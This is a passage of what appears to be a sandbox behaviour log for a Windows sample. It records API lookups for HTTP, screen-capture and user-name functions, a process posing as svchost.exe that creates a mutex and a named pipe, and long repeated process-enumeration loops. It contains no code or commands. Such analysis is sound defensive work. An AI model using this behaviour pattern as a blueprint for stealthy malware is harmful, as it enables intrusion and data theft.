Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x750e5331 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x750ffbf5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x750ea1b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x750dfcca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x750fedfe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x750dff07 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x750e5c62 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x750fc6fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x7510ce21 True 1
Fn
Module Load module_name = PSAPI.DLL, base_address = 0x74eb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x74eb13f0 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75450000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x7546e599 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x754909ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x7547363b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75465ea5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75499d0b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x754986d3 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75130000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x75145689 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x75144de0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7514e743 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x751454f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x75144f70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x75145f49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x75145ea6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x751458b3 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x753749e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x7536b406 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x7536a33e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75361b56 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75374c7d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x7535d075 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x753675e8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x7537f18e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x7536ab49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x753e18f8 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x76c40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x76c71d76 True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x76b60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x76b63eae True 1
Fn
Module Load module_name = Secur32.dll, base_address = 0x748e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x74dea415 True 1
Fn
System Get Info type = Operating System True 2
Fn
Module Get Filename process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 260 True 1
Fn
Mutex Create mutex_name = E58EFF540968A436E982FCFA1C0445A2 True 1
Fn
Thread 0x918
(Host: 2, Network: 0)
+
Category Operation Information Success Count Logfile
File Create Pipe pipe_name = \device\namedpipe\d3b6c4de8cf79a854b549ee232f08c89, open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_OVERLAPPED, max_instances = 255 True 1
Fn
System Sleep duration = -1 (infinite) False 1
Fn
Thread 0x910
(Host: 1764, Network: 0)
+
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77270000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x7728fda0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
